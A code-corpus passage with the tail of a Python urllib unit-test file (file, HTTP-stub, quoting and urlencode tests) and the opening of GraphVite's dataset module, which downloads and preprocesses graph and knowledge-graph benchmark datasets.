"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "__iter__"):
self.assert_(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assert_(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a temporary file.
self.text = 'testing urllib.urlretrieve'
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
def tearDown(self):
# Delete the temporary file.
os.remove(test_support.TESTFN)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assert_(isinstance(result[1], mimetools.Message),
"did not get a mimetools.Message instance as second "
"returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
result = urllib.urlretrieve("file:%s" % test_support.TESTFN, second_temp)
self.assertEqual(second_temp, result[0])
self.assert_(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
finally:
FILE.close()
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assert_(isinstance(count, int))
self.assert_(isinstance(block_size, int))
self.assert_(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
urllib.urlretrieve(test_support.TESTFN, second_temp, hooktester)
os.remove(second_temp)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assert_(expected in result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assert_(expect in result,
"%s not found in %s" % (expect, result))
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
def test_main():
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests
)
if __name__ == '__main__':
test_main()
|
py | 1a32f53a0122b667c478036bf9c2816d821e4c8c | # Copyright 2019 MilaGraph. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Zhaocheng Zhu
"""
Dataset module of GraphVite
Graph
- :class:`BlogCatalog`
- :class:`Youtube`
- :class:`Flickr`
- :class:`Hyperlink2012`
- :class:`Friendster`
- :class:`Wikipedia`
Knowledge Graph
- :class:`Math`
- :class:`FB15k`
- :class:`FB15k237`
- :class:`WN18`
- :class:`WN18RR`
- :class:`Wikidata5m`
- :class:`Freebase`
Visualization
- :class:`MNIST`
- :class:`CIFAR10`
- :class:`ImageNet`
"""
from __future__ import absolute_import, division
import os
import glob
import shutil
import logging
import gzip, zipfile, tarfile
import multiprocessing
from collections import defaultdict
import numpy as np
from . import cfg
logger = logging.getLogger(__name__)
class Dataset(object):
"""
Graph dataset.
Parameters:
name (str): name of dataset
urls (dict, optional): url(s) for each split,
can be either str or list of str
members (dict, optional): zip member(s) for each split,
leave empty for default
Datasets contain several splits, such as train, valid and test.
For each split, there are one or more URLs, specifying the file to download.
You may also specify the zip member to extract.
When a split is accessed, it will be automatically downloaded and decompressed
if it is not present.
You can assign a preprocess for each split, by defining a function with name [split]_preprocess::
class MyDataset(Dataset):
def __init__(self):
super(MyDataset, self).__init__(
"my_dataset",
train="url/to/train/split",
test="url/to/test/split"
)
def train_preprocess(self, input_file, output_file):
with open(input_file, "r") as fin, open(output_file, "w") as fout:
fout.write(fin.read())
f = open(MyDataset().train)
If the preprocess returns a non-trivial value, then it is assigned to the split,
otherwise the file name is assigned.
By convention, only splits ending with ``_data`` have non-trivial return value.
See also:
Pre-defined preprocess functions
:func:`csv2txt`,
:func:`top_k_label`,
:func:`induced_graph`,
:func:`edge_split`,
:func:`link_prediction_split`,
:func:`image_feature_data`
"""
def __init__(self, name, urls=None, members=None):
self.name = name
self.urls = urls or {}
self.members = members or {}
for key in self.urls:
if isinstance(self.urls[key], str):
self.urls[key] = [self.urls[key]]
if key not in self.members:
self.members[key] = [None] * len(self.urls[key])
elif isinstance(self.members[key], str):
self.members[key] = [self.members[key]]
if len(self.urls[key]) != len(self.members[key]):
raise ValueError("Number of members is inconsistent with number of urls in `%s`" % key)
self.path = os.path.join(cfg.dataset_path, self.name)
def relpath(self, path):
return os.path.relpath(path, self.path)
def download(self, url):
from six.moves.urllib.request import urlretrieve
save_file = os.path.basename(url)
if "?" in save_file:
save_file = save_file[:save_file.find("?")]
save_file = os.path.join(self.path, save_file)
if save_file in self.local_files():
return save_file
logger.info("downloading %s to %s" % (url, self.relpath(save_file)))
urlretrieve(url, save_file)
return save_file
def extract(self, zip_file, member=None):
zip_name, extension = os.path.splitext(zip_file)
if zip_name.endswith(".tar"):
extension = ".tar" + extension
zip_name = zip_name[:-4]
if extension == ".txt":
return zip_file
elif member is None:
save_file = zip_name
else:
save_file = os.path.join(os.path.dirname(zip_name), os.path.basename(member))
if save_file in self.local_files():
return save_file
if extension == ".gz":
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with gzip.open(zip_file, "rb") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".tar.gz" or extension == ".tar":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r") as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with tarfile.open(zip_file, "r").extractfile(member) as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
elif extension == ".zip":
if member is None:
logger.info("extracting %s to %s" % (self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file) as fin:
fin.extractall(save_file)
else:
logger.info("extracting %s from %s to %s" % (member, self.relpath(zip_file), self.relpath(save_file)))
with zipfile.ZipFile(zip_file).open(member, "r") as fin, open(save_file, "wb") as fout:
shutil.copyfileobj(fin, fout)
else:
raise ValueError("Unknown file extension `%s`" % extension)
return save_file
def get_file(self, key):
file_name = os.path.join(self.path, "%s_%s.txt" % (self.name, key))
if file_name in self.local_files():
return file_name
urls = self.urls[key]
members = self.members[key]
preprocess_name = key + "_preprocess"
preprocess = getattr(self, preprocess_name, None)
if len(urls) > 1 and preprocess is None:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
extract_files = []
for url, member in zip(urls, members):
download_file = self.download(url)
extract_file = self.extract(download_file, member)
extract_files.append(extract_file)
if preprocess:
result = preprocess(*(extract_files + [file_name]))
if result is not None:
return result
elif os.path.isfile(extract_files[0]):
logger.info("renaming %s to %s" % (self.relpath(extract_files[0]), self.relpath(file_name)))
shutil.move(extract_files[0], file_name)
else:
raise AttributeError(
"There are non-trivial number of files, but function `%s` is not found" % preprocess_name)
return file_name
def local_files(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
return set(glob.glob(os.path.join(self.path, "*")))
def __getattr__(self, key):
if key in self.__dict__:
return self.__dict__[key]
if key in self.urls:
return self.get_file(key)
raise AttributeError("Can't resolve split `%s`" % key)
def csv2txt(self, csv_file, txt_file):
"""
Convert ``csv`` to ``txt``.
Parameters:
csv_file: csv file
txt_file: txt file
"""
logger.info("converting %s to %s" % (self.relpath(csv_file), self.relpath(txt_file)))
with open(csv_file, "r") as fin, open(txt_file, "w") as fout:
for line in fin:
fout.write(line.replace(",", "\t"))
def top_k_label(self, label_file, save_file, k, format="node-label"):
"""
Extract top-k labels.
Parameters:
label_file (str): label file
save_file (str): save file
k (int): top-k labels will be extracted
format (str, optional): format of label file,
can be 'node-label' or '(label)-nodes':
- **node-label**: each line is [node] [label]
- **(label)-nodes**: each line is [node]..., no explicit label
"""
logger.info("extracting top-%d labels of %s to %s" % (k, self.relpath(label_file), self.relpath(save_file)))
if format == "node-label":
label2nodes = defaultdict(list)
with open(label_file, "r") as fin:
for line in fin:
node, label = line.split()
label2nodes[label].append(node)
elif format == "(label)-nodes":
label2nodes = {}
with open(label_file, "r") as fin:
for i, line in enumerate(fin):
label2nodes[i] = line.split()
else:
raise ValueError("Unknown file format `%s`" % format)
labels = sorted(label2nodes, key=lambda x: len(label2nodes[x]), reverse=True)[:k]
with open(save_file, "w") as fout:
for label in sorted(labels):
for node in sorted(label2nodes[label]):
fout.write("%s\t%s\n" % (node, label))
def induced_graph(self, graph_file, label_file, save_file):
"""
Induce a subgraph from labeled nodes. All edges in the induced graph have at least one labeled node.
Parameters:
graph_file (str): graph file
label_file (str): label file
save_file (str): save file
"""
logger.info("extracting subgraph of %s induced by %s to %s" %
(self.relpath(graph_file), self.relpath(label_file), self.relpath(save_file)))
nodes = set()
with open(label_file, "r") as fin:
for line in fin:
nodes.update(line.split())
with open(graph_file, "r") as fin, open(save_file, "w") as fout:
for line in fin:
if not line.startswith("#"):
u, v = line.split()
if u not in nodes or v not in nodes:
continue
fout.write("%s\t%s\n" % (u, v))
def edge_split(self, graph_file, files, portions):
"""
Divide a graph into several splits.
Parameters:
graph_file (str): graph file
files (list of str): file names
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
with open(graph_file, "r") as fin:
for line in fin:
i = np.searchsorted(portions, np.random.rand())
files[i].write(line)
for file in files:
file.close()
def link_prediction_split(self, graph_file, files, portions):
"""
Divide a normal graph into a train split and several test splits for link prediction use.
Each test split contains half true and half false edges.
Parameters:
graph_file (str): graph file
files (list of str): file names,
the first file is treated as train file
portions (list of float): split portions
"""
assert len(files) == len(portions)
logger.info("splitting graph %s into %s" %
(self.relpath(graph_file), ", ".join([self.relpath(file) for file in files])))
np.random.seed(1024)
nodes = set()
edges = set()
portions = np.cumsum(portions, dtype=np.float32) / np.sum(portions)
files = [open(file, "w") for file in files]
num_edges = [0] * len(files)
with open(graph_file, "r") as fin:
for line in fin:
u, v = line.split()[:2]
nodes.update([u, v])
edges.add((u, v))
i = np.searchsorted(portions, np.random.rand())
if i == 0:
files[i].write(line)
else:
files[i].write("%s\t%s\t1\n" % (u, v))
num_edges[i] += 1
nodes = list(nodes)
for file, num_edge in zip(files[1:], num_edges[1:]):
for _ in range(num_edge):
valid = False
while not valid:
u = nodes[int(np.random.rand() * len(nodes))]
v = nodes[int(np.random.rand() * len(nodes))]
valid = u != v and (u, v) not in edges and (v, u) not in edges
file.write("%s\t%s\t0\n" % (u, v))
for file in files:
file.close()
def image_feature_data(self, dataset, model="resnet50", batch_size=128):
"""
Compute feature vectors for an image dataset using a neural network.
Parameters:
dataset (torch.utils.data.Dataset): dataset
model (str or torch.nn.Module, optional): pretrained model.
If it is a str, use the last hidden model of that model.
batch_size (int, optional): batch size
"""
import torch
import torchvision
from torch import nn
logger.info("computing %s feature" % model)
if isinstance(model, str):
full_model = getattr(torchvision.models, model)(pretrained=True)
model = nn.Sequential(*list(full_model.children())[:-1])
num_worker = multiprocessing.cpu_count()
data_loader = torch.utils.data.DataLoader(dataset,
batch_size=batch_size, num_workers=num_worker, shuffle=False)
model = model.cuda()
model.eval()
features = []
with torch.no_grad():
for i, (batch_images, batch_labels) in enumerate(data_loader):
if i % 100 == 0:
logger.info("%g%%" % (100.0 * i * batch_size / len(dataset)))
batch_images = batch_images.cuda()
batch_features = model(batch_images).view(batch_images.size(0), -1).cpu().numpy()
features.append(batch_features)
features = np.concatenate(features)
return features
class BlogCatalog(Dataset):
"""
BlogCatalog social network dataset.
Splits:
graph, label, train, test
Train and test splits are used for link prediction purpose.
"""
def __init__(self):
super(BlogCatalog, self).__init__(
"blogcatalog",
urls={
"graph": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"label": "http://socialcomputing.asu.edu/uploads/1283153973/BlogCatalog-dataset.zip",
"train": [], # depends on `graph`
"valid": [], # depends on `graph`
"test": [] # depends on `graph`
},
members={
"graph": "BlogCatalog-dataset/data/edges.csv",
"label": "BlogCatalog-dataset/data/group-edges.csv"
}
)
def graph_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def label_preprocess(self, raw_file, save_file):
self.csv2txt(raw_file, save_file)
def train_preprocess(self, train_file):
valid_file = train_file[:train_file.rfind("train.txt")] + "valid.txt"
test_file = train_file[:train_file.rfind("train.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def valid_preprocess(self, valid_file):
train_file = valid_file[:valid_file.rfind("valid.txt")] + "train.txt"
test_file = valid_file[:valid_file.rfind("valid.txt")] + "test.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
def test_preprocess(self, test_file):
train_file = test_file[:test_file.rfind("test.txt")] + "train.txt"
valid_file = test_file[:test_file.rfind("test.txt")] + "valid.txt"
self.link_prediction_split(self.graph, [train_file, valid_file, test_file], portions=[100, 1, 1])
class Youtube(Dataset):
"""
Youtube social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Youtube, self).__init__(
"youtube",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/youtube-groupmemberships.txt.gz"
}
)
def label_preprocess(self, raw_file, save_file):
self.top_k_label(raw_file, save_file, k=47)
class Flickr(Dataset):
"""
Flickr social network dataset.
Splits:
graph, label
"""
def __init__(self):
super(Flickr, self).__init__(
"flickr",
urls={
"graph": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-links.txt.gz",
"label": "http://socialnetworks.mpi-sws.mpg.de/data/flickr-groupmemberships.txt.gz"
}
)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=5)
class Hyperlink2012(Dataset):
"""
Hyperlink 2012 graph dataset.
Splits:
pld_train, pld_test
"""
def __init__(self):
super(Hyperlink2012, self).__init__(
"hyperlink2012",
urls={
"pld_train": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_valid": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz",
"pld_test": "http://data.dws.informatik.uni-mannheim.de/hyperlinkgraph/2012-08/pld-arc.gz"
}
)
def pld_train_preprocess(self, graph_file, train_file):
valid_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_valid.txt"
test_file = train_file[:train_file.rfind("pld_train.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_valid_preprocess(self, graph_file, valid_file):
train_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_train.txt"
test_file = valid_file[:valid_file.rfind("pld_valid.txt")] + "pld_test.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
def pld_test_preprocess(self, graph_file, test_file):
train_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_train.txt"
valid_file = test_file[:test_file.rfind("pld_test.txt")] + "pld_valid.txt"
self.link_prediction_split(graph_file, [train_file, valid_file, test_file], portions=[10000, 1, 1])
class Friendster(Dataset):
"""
Friendster social network dataset.
Splits:
graph, small_graph, label
"""
def __init__(self):
super(Friendster, self).__init__(
"friendster",
urls={
"graph": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"small_graph": ["https://snap.stanford.edu/data/bigdata/communities/com-friendster.ungraph.txt.gz",
"https://snap.stanford.edu/data/bigdata/communities/com-friendster.all.cmty.txt.gz"],
"label": "https://snap.stanford.edu/data/bigdata/communities/com-friendster.top5000.cmty.txt.gz"
}
)
def small_graph_preprocess(self, graph_file, label_file, save_file):
self.induced_graph(graph_file, label_file, save_file)
def label_preprocess(self, label_file, save_file):
self.top_k_label(label_file, save_file, k=100, format="(label)-nodes")
class Wikipedia(Dataset):
"""
Wikipedia dump for word embedding.
Splits:
graph
"""
def __init__(self):
super(Wikipedia, self).__init__(
"wikipedia",
urls={
"graph": "https://www.dropbox.com/s/mwt4uu1qu9fflfk/enwiki-latest-pages-articles-sentences.txt.gz?dl=1"
}
)
class Math(Dataset):
"""
Synthetic math knowledge graph dataset.
Splits:
train, valid, test
"""
NUM_ENTITY = 1000
NUM_RELATION = 30
OPERATORS = [
("+", lambda x, y: (x + y) % Math.NUM_ENTITY),
("-", lambda x, y: (x - y) % Math.NUM_ENTITY),
("*", lambda x, y: (x * y) % Math.NUM_ENTITY),
("/", lambda x, y: x // y),
("%", lambda x, y: x % y)
]
def __init__(self):
super(Math, self).__init__(
"math",
urls={
"train": [],
"valid": [],
"test": []
}
)
def train_preprocess(self, save_file):
np.random.seed(1023)
self.generate_math(save_file, num_triplet=20000)
def valid_preprocess(self, save_file):
np.random.seed(1024)
self.generate_math(save_file, num_triplet=1000)
def test_preprocess(self, save_file):
np.random.seed(1025)
self.generate_math(save_file, num_triplet=1000)
def generate_math(self, save_file, num_triplet):
with open(save_file, "w") as fout:
for _ in range(num_triplet):
i = int(np.random.rand() * len(self.OPERATORS))
op, f = self.OPERATORS[i]
x = int(np.random.rand() * self.NUM_ENTITY)
y = int(np.random.rand() * self.NUM_RELATION) + 1
fout.write("%d\t%s%d\t%d\n" % (x, op, y, f(x, y)))
class FB15k(Dataset):
"""
FB15k knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k, self).__init__(
"fb15k",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k/test.txt"
}
)
class FB15k237(Dataset):
"""
FB15k-237 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(FB15k237, self).__init__(
"fb15k-237",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/FB15k-237/test.txt"
}
)
class WN18(Dataset):
"""
WN18 knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18, self).__init__(
"wn18",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/valid.txt",
"test": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18/test.txt"
}
)
class WN18RR(Dataset):
"""
WN18RR knowledge graph dataset.
Splits:
train, valid, test
"""
def __init__(self):
super(WN18RR, self).__init__(
"wn18rr",
urls={
"train": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/train.txt",
"valid": "https://github.com/DeepGraphLearning/KnowledgeGraphEmbedding/raw/master/data/wn18rr/valid.txt",
